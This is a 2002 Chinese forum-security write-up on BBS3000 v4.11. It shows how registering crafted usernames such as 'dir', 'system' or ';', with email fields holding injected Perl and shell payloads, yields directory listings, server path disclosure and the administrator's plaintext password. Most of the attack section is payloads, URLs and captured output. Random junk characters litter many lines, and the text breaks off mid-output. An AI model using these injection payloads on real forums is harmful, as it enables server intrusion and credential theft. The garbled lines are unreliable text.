窥探YUZI的BBS3000社区安全性--1

YES东

窥探YUZI的BBS3000社区安全性--1
/ W( y9 ?5 U! B; g0 k文章类型：漏洞分析 文章加入时间：2002年1月24日22:24
--------------------------------------------------------------------------------
9 O7 g: S# d& P' a. `5 x
. M2 y0 q' g  M窥探YUZI的BBS3000社区安全性
—————————————————————————————————
. E, y& q% y% G$ T# L5 N* N( jbadboy-club@21cn.com
. n2 j/ j( z. P0 b5 u9 q( e- C部分漏洞提供者：
0 U* \9 R" i  E+ aadver
x.z
这并不是什么权威教材，只适合菜鸟了解某些免费提供的论坛程序存在的不
8 `, B" S$ t5 \2 a; P$ P' g) h安全面，切莫用此方法在国内做尝试，如果你偏要如此，那么由此引起的一
* N$ g( \3 N% h& _! Z$ J切法律后果由你自己负责。
  F3 R3 X$ }  H& o* P6 p本文只允许在网络任意转载，但须保留文章的完整性，如把本文作为经济目
9 Q5 i: a0 |, e; r; X* B3 q的使用，或者未经本人许可进行印刷、光盘杂志、等出版性质的行为，本人
' [- h& X* a' {: G9 {: C将保留侵权控告的权利。
—————————————————————————————————
% w# ~6 I$ k, u4 f4 y第一篇
****基本漏洞测试*****
. u  C$ L8 x) Z3 L: h0 J. {$ t7 G0 E    YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛，
3 d- Z4 ?" w0 X& u' \1 z; n但不少用户很少去探测这论坛的安全性，使用者很大程度上信任作者，而实际上
这些免费的版本和汉化修改论坛，往往存在一些致命的漏洞，本文的目的在于揭
3 O8 K! [8 ~1 {9 N1 l- H示该论坛不为人知的漏洞，让大家更好的使用这类论坛，并且保证自身资料的隐
蔽和服务器的安全。
1 j8 j+ n1 Q. W! B5 W( Q& Q测试版本:bbs3000 v4.11
( m0 O- P5 O1 n! @  t) E* G系统平台：win2k adv server=sp3 + iis 5.0  +ActivePerl 5.6.1.626
应用程序映射:perl.exe %s %s 动作：GET,HEAD,POST
0 s7 N) I  a; G2 _        或者:perlIS.dll 动作：GET,HEAD,POST
测试情况：
; D- G0 W" C: w$ ^* c! d3 h一、用户名为dir的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
在站点建立一目录（或者虚拟目录）bbs3000,按论坛作者提供的说明书，默认安
装BBS3000 v4.11版本，我们注册一用户名为dir,密码为system,信箱为
+ F' V# ^: q6 b  u0 O#badboy@badclub.org（#任意信箱都可以），然后我们在IE地址栏处输入：
http://192.168.0.1/bbs3000/yhzl/dir.cgi
8 }' i& T& L0 _F:\new\bbs3000\bbs3000 的目录
2002-01-16  19:26       <DIR>          .
2002-01-16  19:26       <DIR>          ..
) \. B5 w6 ?/ s  }1 s0 a. [2002-01-16  22:42               43,247 bbs.cgi
2002-01-16  22:47               50,934 cjyh.cgi
+ W2 x0 z* t! j2002-01-16  22:43               38,551 bbs1.cgi
  T8 _7 Y; s% U. b1 G3 X2002-01-16  22:48                6,401 cookie.cgi
2002-01-16  22:42                2,138 affiche.cgi
2002-01-16  22:43               22,434 bbs2.cgi
" G6 m& C( b8 p. Z. A（以下略）
: c7 S$ G& t4 L2 e9 ^, U' M1 S& i: a4 T              34 个文件        417,611 字节
! Z9 u6 D6 r8 Q              15 个目录  1,830,944,768 可用字节
5 i' f# D& R2 A' ~, S
& _) P3 I5 R! H; [9 {7 _2、采用应用程序映射:perlIS.dll应用程序映射
  E& T9 c' T! Z3 g6 {$ e0 h得到的显示页面为：
'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
) @- k* K- f- j% H& ~测试解释：在应用程序映射中，一个扩展名只能由一个程序去映射，在采用
perl.exe时，BBS3000存在查看网站目录和文件的漏洞，在采用perlIS.dll时，
则有暴露网站在服务器上的绝对地址的漏洞。
二、用户名为system的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
注册一用户名为system，密码为空格键（或者密码为system），信箱为
'dir c:'#@badclub.org，然后我们在IE地址栏内输入：
8 w# R  M2 t( D- o/ d- n9 P/ }+ Yhttp://192.168.0.1/bbs3000/yhzl/system.cgi
% \% k% T9 k' b  \返回的页面显示为：
) r1 G8 Y+ U) s, V& h/ tC:\ 的目录
2001-11-27  20:56                1,002 FRUNLOG.TXT
2001-11-27  20:49       <DIR>          WINNT
9 [3 L) `* _* u3 F8 \* @" G（以下略）
2 f4 w/ C0 g4 K/ Z; H7 _4 k; W              10 个文件         29,583 字节
               9 个目录    946,327,552 可用字节
9 ]/ {  _( [- X; `/ I+ x1 J当密码为其他时，则显示：
! h- A* n. Q& t7 o6 s* Q5 p1 f% NCGI Error
+ j/ E' C2 w1 h; a/ G4 w8 k9 x& SThe specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
syntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
- L5 Z) A* Y' ~1 t  W- a- caborted due to compilation errors.
6 w1 K" B. X2 ]7 O; d我们还可以这样测试用户名为system的情况，密码仍然为空格键
（或者密码为system）但把信箱修改为＠ARGV##badboy@badclub.org，然后我
们在IE地址栏内输入：
" y$ C( d) V# |http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
' q1 m# t  K8 N  }1 V; I返回的页面显示
& t, U: O! w2 Y5 w6 y" CD:\ 的目录
' Y/ I0 c" c% J% S5 s* {9 ^, Q2001-01-18  23:23       <DIR>          tools
2001-11-27  21:18       <DIR>          98tools
2001-04-08  13:08       <DIR>          W2Kreskit
; f) [: B, p3 G/ Q+ S4 Q$ a2001-11-06  19:52       <DIR>          NOCDKEY-PROT
2001-12-01  21:32       <DIR>          WINNT
2001-12-01  21:39       <DIR>          Documents and Settings
2001-12-01  21:41       <DIR>          Program Files
. v3 c: a5 z( T2 D0 k/ _* T2001-12-01  21:53       <DIR>          Inetpub
2002-01-16  19:17       <DIR>          pl
（以下省略部分内容）   
3 K$ A) J$ z: J! O/ _           12 个文件     15,068,818 字节
              15 个目录  2,371,317,760 可用字节
'0' 不是内部或外部命令，也不是可运行的程序
2 _; n7 {- k& {. D" x6 K或批处理文件。
% o( h% W4 o( T6 c# H# g2 U$ W  h. D2、采用应用程序映射:perlIS.dll应用程序映射
+ }5 R1 g" E( V" j用户名为system，密码为空格键（或者密码为system），信箱为'dir c:'#@badclub.org，
) w3 b2 e: F" n; W! y1 A. e9 L然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi
$ ]; y7 n0 H% m  ?  \. \返回的页面显示为：
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
把信箱修改为＠ARGV##badboy@badclub.org，然后我们在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
! Z1 z7 L/ }$ d9 D三、用户名为;字符的情况
1、采用应用程序映射:perlIS.dll应用程序映射
8 N5 b& E' P4 X  d& k1 A注册一用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ，
（这里假设badboy为该论坛的社区区长，也就是该论坛最大权限的用户），然后我们
6 b7 y6 p6 K3 C% p+ h9 [! T, L在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
! z# j" x7 Z% u9 ~$ ?. J& m嗯，怎么还是和上面的perl.dll例子一样啊？？后面的就是关键了，你再输入这样
的看看
9 M# J# |# ]; a! i! K8 O& Uhttp://192.168.0.1/bbs3000/yhzl/badboy.txt
返回的页面显示为
badpass badboy http://192.168.0.1 2002-01-16
显示的内容前面就是密码、用户
5 P. D' z! _& M+ x3 w天啊，事情怎么那么容易呀！！~_*
经测试，用户名为system密码为一个空格键（或者为system)，信箱为
rename "badboy.cgi","badboy.txt";#@badclub.org 的时候，步骤和上面一样，同样
1 `; l2 u* Y* }! {0 R4 l可以获得相同的结果。
5 ]+ {+ |( V+ A0 g0 N2、采用应用程序映射:perl.exe %s %s应用程序映射
用户名为;字符，密码为1，信箱为rename "badboy.cgi","badboy.txt";#@badclub.org
在IE地址栏内输入：
http://192.168.0.1/bbs3000/yhzl/;.cgi
5 T; H% b0 R& E: @( f返回的页面显示
5 H- ?& a, ~, U9 D- O# y/ E# N( o8 gCGI Error
$ k' R! m4 y( ^3 {* UThe specified CGI application misbehaved by not returning a complete set of HTTP
. ?0 f8 n6 [4 ?1 w( g( {headers. The headers it did return are: